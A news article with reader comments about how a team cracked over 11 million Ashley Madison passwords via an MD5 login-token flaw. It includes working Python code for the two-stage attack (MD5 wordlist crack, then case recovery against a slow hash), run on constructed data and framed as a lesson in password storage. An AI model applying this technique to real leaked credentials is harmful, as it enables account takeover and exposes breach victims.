Team manages to crack more than 11 million Ashley Madison passwords

By Scorpus
Sep 11, 2015
  1. The Ashley Madison hack has been nothing short of a disaster. Among the gigabytes of data leaked from the website's servers were 36 million password hashes produced with bcrypt, a deliberately slow, salted algorithm built to make guessing expensive. Cracking those hashes directly was expected to take centuries, but due to a programming error on Ashley Madison's part, 15.26 million of the passwords can be recovered far faster.

    CynoSure Prime, the group behind the cracking effort, discovered that for around 40 percent of the accounts an MD5-based token was stored alongside the bcrypt hash. MD5 is vastly cheaper to compute than bcrypt: it is a general-purpose hash designed to be fast, has no work factor or salt, and was never intended for password storage, so a GPU can test billions of guesses per second against it.

    The programming error was a "$loginkey" token computed as the MD5 hash of the user's username and plaintext password, both converted to lowercase. Because the username was already known and MD5 is fast and unsalted, cracking a token came down to fixing the username and trying billions of candidate passwords. Lowercasing also shrank the search space, since every mixed-case variant of a password collapses to the same token.

    Cracking an MD5 token yields only the lowercased password, so the team then had to recover the original capitalisation and verify it against the bcrypt hash. Each bcrypt test is slow, but the number of candidates is tiny: only the case variants of one known word (at most 2^n for n letters) rather than the whole keyspace. Around 90 percent of users had chosen an all-lowercase password, which matches on the very first bcrypt attempt, and the remaining ten percent needed only a small number of bcrypt computations each.

    Thanks to the fast MD5 token, the team cracked 11.2 million passwords in around ten days, and it won't take long to recover the remaining four million. The team estimated that attacking the MD5 tokens rather than the bcrypt hashes was around a million times faster.

    The ease of cracking these passwords shows how important it is not to reuse a password across services: once a username/password pair is recovered from one breach, attackers routinely try it against other sites, and a unique password per service is what stops that.

    It is also a lesson for developers in what not to do when storing passwords. The MD5 token leaked the password because it was derived from the plaintext; a token derived from the bcrypt output instead, or better still a random value that is not derived from the password at all, gives an attacker nothing to crack back to the password. In fact the developers changed the token scheme after a certain point, which is why 60 percent of the leaked Ashley Madison passwords remain uncracked.
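    The two-stage attack described above (fast MD5 crack of the lowercased token, then case recovery against the slow hash) and the contrast with a token that is not derived from the password, as an added example. This is illustrative code written for this page, not CynoSure Prime's tooling and not Ashley Madison's code. It assumes the token is MD5 over lowercased username followed by lowercased password (the exact concatenation is not stated on the page), and, because bcrypt is not in Python's standard library, it uses salted PBKDF2-HMAC-SHA256 with a high iteration count in the role of the slow hash. The leaked records and wordlist are constructed for the demo.

```python
import hashlib
import itertools
import secrets

# Stand-in for bcrypt (assumption): a salted, deliberately slow hash.
SLOW_ITERATIONS = 50_000


def slow_hash(password: str, salt: bytes) -> bytes:
    """Salted, slow hash playing the bcrypt role from the article."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, SLOW_ITERATIONS)


def weak_loginkey(username: str, password: str) -> str:
    """The flaw the article describes: an unsalted, fast MD5 over the
    lowercased username and lowercased password (format is an assumption)."""
    return hashlib.md5((username.lower() + password.lower()).encode()).hexdigest()


def safe_loginkey() -> str:
    """What a login token should be: random, kept server-side, and not
    derived from the password, so it cannot be cracked back to it."""
    return secrets.token_hex(32)


def crack_loginkey(username: str, loginkey: str, wordlist):
    """Stage 1: fix the known username and guess the lowercased password
    with fast MD5. Returns (lowercased password or None, MD5 computations)."""
    tried = 0
    for guess in wordlist:
        tried += 1
        if weak_loginkey(username, guess) == loginkey:
            return guess.lower(), tried
    return None, tried


def case_variants(lower_pw: str):
    """Every re-capitalisation of a lowercase string, cheapest guesses first:
    fewer uppercase letters before more, and earlier positions before later
    (all-lowercase first, then capitalised first letter, and so on)."""
    positions = [i for i, ch in enumerate(lower_pw) if ch.isalpha()]
    masks = sorted(itertools.product((0, 1), repeat=len(positions)),
                   key=lambda m: (sum(m), tuple(-b for b in m)))
    for mask in masks:
        chars = list(lower_pw)
        for flag, i in zip(mask, positions):
            if flag:
                chars[i] = chars[i].upper()
        yield "".join(chars)


def recover_case(lower_pw: str, salt: bytes, slow_digest: bytes):
    """Stage 2: replay only the case variants of the cracked word against the
    slow hash. Returns (original password or None, slow-hash computations)."""
    tried = 0
    for candidate in case_variants(lower_pw):
        tried += 1
        if slow_hash(candidate, salt) == slow_digest:
            return candidate, tried
    return None, tried


def attack(record: dict, wordlist):
    """Full two-stage attack on one leaked record.
    Returns (password or None, MD5 computations, slow-hash computations)."""
    lower_pw, fast_tries = crack_loginkey(record["user"], record["loginkey"], wordlist)
    if lower_pw is None:
        return None, fast_tries, 0
    password, slow_tries = recover_case(lower_pw, record["salt"], record["hash"])
    return password, fast_tries, slow_tries


def make_record(user: str, password: str) -> dict:
    """Build one constructed 'leaked' row: slow hash plus the weak MD5 token.
    A real bcrypt store would use a random per-user salt; this one is fixed
    per user only so the demo is deterministic."""
    salt = b"demo-salt-" + user.encode()
    return {"user": user, "salt": salt,
            "hash": slow_hash(password, salt),
            "loginkey": weak_loginkey(user, password)}


# Constructed sample data, not real leaked records.
LEAK = [make_record("alice", "Summer2015"), make_record("bob", "password1")]
WORDLIST = ["123456", "letmein", "password1", "summer2015", "qwerty"]

if __name__ == "__main__":
    for rec in LEAK:
        pw, fast, slow = attack(rec, WORDLIST)
        print(f"{rec['user']}: {pw!r} after {fast} MD5 guesses and {slow} slow-hash guesses")
```

    The cost asymmetry is the whole point: the wordlist is tried only against MD5, and the slow hash is touched just once for an all-lowercase password (bob) and twice for a capitalised one (alice). A record whose token was built with `safe_loginkey()` instead would give stage 1 nothing to invert, and the attacker would be back to guessing against the slow hash.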


  2. stewi0001

    stewi0001 TS Evangelist Posts: 1,136   +480

    Is the site shutdown yet?
  3. NightAngel79

    NightAngel79 TS Booster Posts: 159   +37

    Nope, still says, "Join over 40,000,000 anonymous members" LMFAO!!
  4. Camikazi

    Camikazi TS Maniac Posts: 797   +217

    Considering they had around 37 million when this all started, it seems they have added more users.
  5. cmbjive

    cmbjive TS Booster Posts: 777   +137

    Moral of the story: Don't cheat.

    Immoral of the story: If you're going to cheat, don't use an online service.
  6. DaveBG

    DaveBG TS Addict Posts: 216   +72

    Haha I bet they have just run the female creator bot for a while.
  7. Skidmarksdeluxe

    Skidmarksdeluxe TS Evangelist Posts: 6,335   +1,937

    I wonder how many of the passwords were s***m*c***... ;)
  8. Skidmarksdeluxe

    Skidmarksdeluxe TS Evangelist Posts: 6,335   +1,937

    Yeah. Maybe the new users like the thrill of the chase, maybe they like the thrill of... err... I guess you can figure that out, or maybe they just never knew a site like this existed and discovering it was like manna from heaven. I dunno. Who knows how these two-timers think?
  9. Skidmarksdeluxe

    Skidmarksdeluxe TS Evangelist Posts: 6,335   +1,937

    The only logical conclusion I can come to is that maybe the "0" key on the keyboard was sticky.
  10. Satish Mallya

    Satish Mallya TS Addict Posts: 124   +92

    This now actually makes it much easier to identify users - trawling through someone's email can uniquely identify them a lot more easily than simply knowing their email addresses, possibly with info like their physical addresses, contacts, etc.

    Plus all the other attached accounts.
